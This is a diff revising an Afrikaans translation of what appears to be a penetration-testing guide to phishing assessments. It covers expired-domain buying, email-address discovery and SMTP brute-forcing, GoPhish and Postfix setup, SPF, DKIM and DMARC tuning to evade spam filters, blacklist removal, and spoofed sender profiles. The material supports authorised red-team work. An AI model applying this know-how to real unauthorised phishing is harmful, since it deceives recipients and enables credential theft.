+Jy kan soek op [https://www.expireddomains.net/](https://www.expireddomains.net) vir 'n vervalde domein wat jy kan gebruik.\
+Om seker te maak dat die vervalde domein wat jy gaan koop **reeds 'n goeie SEO het**, kan jy kyk hoe dit gekategoriseer word in:
- [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
- [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
-## Ontdek e-posadresse
+## Ontdekking van E-posadresse
- [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester) (100% free)
- [https://phonebook.cz/](https://phonebook.cz) (100% free)
@@ -78,17 +78,17 @@ Om seker te maak dat die verloopte domein wat jy gaan koop **reeds 'n goeie SEO
- [https://hunter.io/](https://hunter.io)
- [https://anymailfinder.com/](https://anymailfinder.com)
-Om meer geldige e-posadresse te **ontdek** of die wat jy reeds gevind het te **verifieer**, kan jy kyk of jy hul SMTP-bedieners van die slagoffer kan brute-force. [Leer hoe om e-posadresse te verifieer/ontdek hier](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
-Bovendien, moenie vergeet dat as gebruikers **enige webportaal gebruik om toegang tot hul e-posse te kry**, jy kan kontroleer of dit vatbaar is vir **username brute force**, en die kwesbaarheid misbruik indien moontlik.
+Om meer geldige e-posadresse te **ontdek** of die wat jy reeds gevind het te **verifieer**, kan jy kyk of jy die smtp-bedieners van die slagoffer kan brute-force. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/index.html#username-bruteforce-enumeration).\
+Verder, moenie vergeet dat as gebruikers **'n webportaal gebruik om hul e-posse te bereik** nie, jy kan kyk of dit kwesbaar is vir **username brute force**, en die kwesbaarheid benut indien moontlik.
-## Konfigurasie van GoPhish
+## Konfigureer GoPhish
-### Installasie
+### Installering
-Jy kan dit aflaai vanaf [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
+You can download it from [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)
-Laai dit af en pak dit uit binne `/opt/gophish` en voer `/opt/gophish/gophish` uit\
-Jy sal 'n wagwoord vir die admin-gebruiker in die uitset op poort 3333 kry. Daarom, kry toegang tot daardie poort en gebruik daardie geloofsbriewe om die admin-wagwoord te verander. Jy mag daardie poort na lokaal moet tunnel:
+Laai dit af en pak dit uit in `/opt/gophish` en voer `/opt/gophish/gophish` uit.\
+Jy sal 'n wagwoord vir die admin-gebruiker vir poort 3333 in die uitset kry. Daarom, verkry toegang tot daardie poort en gebruik daardie geloofsbriewe om die admin-wagwoord te verander. Jy mag daardie poort na lokaal moet tunnel:
```bash
ssh -L 3333:127.0.0.1:3333 @
```
@@ -96,7 +96,7 @@ ssh -L 3333:127.0.0.1:3333 @
**TLS-sertifikaatkonfigurasie**
-Voor hierdie stap moet jy **reeds die domein gekoop het** wat jy gaan gebruik, en dit moet **wys na** die **IP van die VPS** waar jy **gophish** konfigureer.
+Voordat jy hierdie stap uitvoer moet jy **reeds die domein gekoop het** wat jy gaan gebruik, en dit moet **wys** na die **IP of the VPS** waar jy **gophish** konfigureer.
```bash
DOMAIN=""
wget https://dl.eff.org/certbot-auto
@@ -122,23 +122,23 @@ Voeg dan die domein by die volgende lêers:
- **/etc/postfix/transport**
- **/etc/postfix/virtual_regexp**
-**Verander ook die waardes van die volgende veranderlikes binne /etc/postfix/main.cf**
+**Verander ook die waardes van die volgende veranderlikes in /etc/postfix/main.cf**
`myhostname = `\
`mydestination = $myhostname, , localhost.com, localhost`
-Laastens wysig die lêers **`/etc/hostname`** en **`/etc/mailname`** na jou domeinnaam en **herbegin jou VPS.**
+Laastens, wysig die lêers **`/etc/hostname`** en **`/etc/mailname`** na jou domeinnaam en **herbegin jou VPS.**
-Skep nou 'n **DNS A record** vir `mail.` wat wys na die **IP-adres** van die VPS en 'n **DNS MX** record wat wys na `mail.`
+Skep nou 'n **DNS A record** vir `mail.` wat na die **IP-adres** van die VPS wys en 'n **DNS MX** record wat na `mail.` wys
Kom ons toets nou om 'n e-pos te stuur:
```bash
apt install mailutils
echo "This is the body of the email" | mail -s "This is the subject line" test@email.com
```
-**Gophish konfigurasie**
+**Gophish configuration**
-Stop die uitvoering van gophish en laat ons dit konfigureer.\
+Stop die uitvoering van gophish en kom ons konfigureer dit.\
Wysig `/opt/gophish/config.json` na die volgende (let op die gebruik van https):
```bash
{
@@ -164,9 +164,9 @@ Wysig `/opt/gophish/config.json` na die volgende (let op die gebruik van https):
}
}
```
-**Konfigureer gophish service**
+**Konfigureer gophish-diens**
-Om die gophish service te skep sodat dit outomaties begin kan word en as 'n service bestuur kan word, kan jy die lêer `/etc/init.d/gophish` skep met die volgende inhoud:
+Om die gophish-diens te skep sodat dit outomaties begin en as 'n diens bestuur kan word, kan jy die lêer `/etc/init.d/gophish` met die volgende inhoud skep:
```bash
#!/bin/bash
# /etc/init.d/gophish
@@ -213,7 +213,7 @@ case $1 in
start|stop|status) "$1" ;;
esac
```
-Voltooi die konfigurasie van die diens en kontroleer dit deur die volgende te doen:
+Voltooi die konfigurering van die diens en kontroleer dit deur die volgende te doen:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
@@ -224,23 +224,23 @@ service gophish status
ss -l | grep "3333\|443"
service gophish stop
```
-## Konfigurasie van e-posbediener en domein
+## Konfigureer e-posbediener en domein
-### Wag & wees geloofwaardig
+### Wag en wees geloofwaardig
-Hoe ouer 'n domein is, hoe minder waarskynlik is dit dat dit as spam aangemerk sal word. Wag dus so lank as moontlik (ten minste 1 week) voor die phishing assessment. Boonop, as jy 'n bladsy oor 'n reputasie-verwante sektor plaas, sal die verkrygde reputasie beter wees.
+Hoe ouer 'n domein is, hoe minder waarskynlik is dit dat dit as spam gevang word. Jy moet dus so lank as moontlik wag (ten minste 1 week) voordat die phishing-assessering. Boonop, as jy 'n bladsy oor 'n reputasiesektor plaas, sal die verkrygde reputasie beter wees.
-Let daarop dat selfs al moet jy 'n week wag, jy nou alles kan klaarmaak.
+Let wel: selfs al moet jy 'n week wag, kan jy nou reeds alles konfigureer.
### Konfigureer Reverse DNS (rDNS) rekord
-Stel 'n rDNS (PTR) rekord in wat die IP-adres van die VPS na die domeinnaam oplos.
+Stel 'n rDNS (PTR)-rekord in wat die IP-adres van die VPS na die domeinnaam oplos.
-### Sender Policy Framework (SPF) Rekord
+### Sender Policy Framework (SPF) Record
-Jy moet **'n SPF-rekord vir die nuwe domein konfigureer**. As jy nie weet wat 'n SPF-rekord is nie [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
+Jy moet **'n SPF record vir die nuwe domein konfigureer**. As jy nie weet wat 'n SPF record is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/index.html#spf).
-Jy kan [https://www.spfwizard.net/](https://www.spfwizard.net) gebruik om jou SPF-beleid te genereer (gebruik die IP van die VPS-masjien)
+Jy kan [https://www.spfwizard.net/](https://www.spfwizard.net) gebruik om jou SPF-beleid te genereer (gebruik die IP van die VPS)
.png>)
@@ -248,35 +248,34 @@ Dit is die inhoud wat in 'n TXT-rekord in die domein gestel moet word:
```bash
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
-### Domeingebaseerde boodskapverifikasie, verslaggewing & nakoming (DMARC) Rekord
+### Domain-based Message Authentication, Reporting & Conformance (DMARC) Rekord
-Jy moet **'n DMARC-rekord vir die nuwe domein konfigureer**. As jy nie weet wat 'n DMARC-rekord is nie [**read this page**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
+Jy moet **'n DMARC-rekord vir die nuwe domein konfigureer**. As jy nie weet wat 'n DMARC-rekord is nie [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/index.html#dmarc).
-Jy moet 'n nuwe DNS TXT-rekord skep wat na die gasheernaam `_dmarc.` wys met die volgende inhoud:
+Jy moet 'n nuwe DNS TXT-rekord skep wat na die hostname `_dmarc.` wys met die volgende inhoud:
```bash
v=DMARC1; p=none
```
### DomainKeys Identified Mail (DKIM)
-Jy moet **'n DKIM vir die nuwe domein konfigureer**. As jy nie weet wat 'n DMARC-record is nie [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
+Jy moet **'n DKIM vir die nuwe domein konfigureer**. As jy nie weet wat 'n DMARC-rekord is nie, [**lees hierdie bladsy**](../../network-services-pentesting/pentesting-smtp/index.html#dkim).
This tutorial is based on: [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
> [!TIP]
-> Jy moet beide B64-waardes wat die DKIM-sleutel genereer aanmekaar koppel:
+> Jy moet beide B64-waardes wat die DKIM-sleutel genereer, saamkoppel:
>
> ```
> v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqPtzYk81njjQCrChIcHzxOp8a1wjbsoNtka2X9QXCZs+iXkvw++QsWDtdYu3q0Ofnr0Yd/TmG/Y2bBGoEgeE+YTUG2aEgw8Xx42NLJq2D1pB2lRQPW4IxefROnXu5HfKSm7dyzML1gZ1U0pR5X4IZCH0wOPhIq326QjxJZm79E1nTh3xj" "Y9N/Dt3+fVnIbMupzXE216TdFuifKM6Tl6O/axNsbswMS1TH812euno8xRpsdXJzFlB9q3VbMkVWig4P538mHolGzudEBg563vv66U8D7uuzGYxYT4WS8NVm3QBMg0QKPWZaKp+bADLkOSB9J2nUpk4Aj9KB5swIDAQAB
> ```
-### Toets jou e-poskonfigurasie telling
+### Toets die telling van jou e-poskonfigurasie
-Jy kan dit doen deur [https://www.mail-tester.com/](https://www.mail-tester.com)\
-Besigtig net die bladsy en stuur 'n e-pos na die adres wat hulle jou gee:
+Jy kan dit doen deur [https://www.mail-tester.com/](https://www.mail-tester.com/) te gebruik. Gaan net na die bladsy en stuur 'n e-pos na die adres wat hulle jou gee:
```bash
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
```
-Jy kan ook **kontroleer jou email-konfigurasie** deur 'n email te stuur na `check-auth@verifier.port25.com` en **die reaksie te lees** (hiervoor sal jy port **25** moet **oopmaak** en die reaksie sien in die lêer _/var/mail/root_ as jy die email as root stuur).\
+Jy kan ook **kontroleer jou e-poskonfigurasie** deur 'n e-pos te stuur na `check-auth@verifier.port25.com` en **die reaksie te lees** (hiervoor sal jy **oopmaak** port **25** en die reaksie sien in die lêer _/var/mail/root_ as jy die e-pos as root stuur).\
Kontroleer dat jy al die toetse slaag:
```bash
==========================================================
@@ -288,39 +287,39 @@ DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham
```
-Jy kan ook 'n **boodskap na 'n Gmail wat jy beheer** stuur en die **e-pos se headers** in jou Gmail-inboks nagaan; `dkim=pass` moet in die `Authentication-Results` header field voorkom.
+Jy kan ook **'n boodskap na 'n Gmail wat jy beheer** stuur, en kontroleer die **e-pos se headers** in jou Gmail-inbox; `dkim=pass` moet in die `Authentication-Results` header field teenwoordig wees.
```
Authentication-Results: mx.google.com;
spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
dkim=pass header.i=@example.com;
```
-### Verwyder uit Spamhouse Blacklist
+### Verwydering vanaf Spamhouse Swartlys
-Die bladsy [www.mail-tester.com](https://www.mail-tester.com) kan aandui of jou domein geblokkeer word deur spamhouse. Jy kan versoek dat jou domein/IP verwyder word by: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
+Die blad [www.mail-tester.com](https://www.mail-tester.com) kan aandui of jou domein deur spamhouse geblokkeer word. Jy kan versoek om jou domein/IP verwyder te kry by: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)
-### Verwyder uit Microsoft Blacklist
+### Verwydering vanaf Microsoft Swartlys
-Jy kan versoek dat jou domein/IP verwyder word by [https://sender.office.com/](https://sender.office.com).
+Jy kan versoek om jou domein/IP verwyder te kry by [https://sender.office.com/](https://sender.office.com).
-## Skep & Begin GoPhish Veldtog
+## Skep en Lanseer GoPhish-veldtog
### Stuurprofiel
-- Stel 'n **naam** om die afsenderprofiel te identifiseer
-- Bepaal vanaf watter rekening jy die phishing-e-posse gaan stuur. Voorstelle: _noreply, support, servicedesk, salesforce..._
-- Jy kan die gebruikersnaam en wagwoord leeg laat, maar maak seker dat jy die Ignore Certificate Errors merk
+- Stel 'n **naam om te identifiseer** vir die senderprofiel
+- Bepaal van watter rekening jy die phishing-e-posse gaan stuur. Voorstelle: _noreply, support, servicedesk, salesforce..._
+- Jy kan die gebruikersnaam en wagwoord leeg laat, maar maak seker dat jy die Ignore Certificate Errors aanvink
 (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>)
> [!TIP]
> Dit word aanbeveel om die "**Send Test Email**" funksionaliteit te gebruik om te toets dat alles werk.\
-> Ek sou aanbeveel om **send the test emails to 10min mails addresses** om te voorkom dat jy tydens toetse op 'n blacklist beland.
+> Ek beveel aan om **send the test emails to 10min mails addresses** te gebruik om te voorkom dat jy by toetse op 'n swartlys beland.
### E-pos Sjabloon
-- Stel 'n **naam om te identifiseer** die sjabloon
-- Skryf dan 'n **onderwerp** (niks vreemd, net iets wat jy in 'n gewone e-pos sou verwag om te lees)
-- Maak seker jy het die "**Add Tracking Image**" aangestip
+- Stel 'n **naam om te identifiseer** vir die sjabloon
+- Skryf dan 'n **onderwerp** (niks vreemds nie, net iets wat jy in 'n gewone e-pos sou verwag om te lees)
+- Maak seker dat jy die "**Add Tracking Image**" gevink het
- Skryf die **e-pos sjabloon** (jy kan veranderlikes gebruik soos in die volgende voorbeeld):
```html
@@ -340,66 +339,66 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY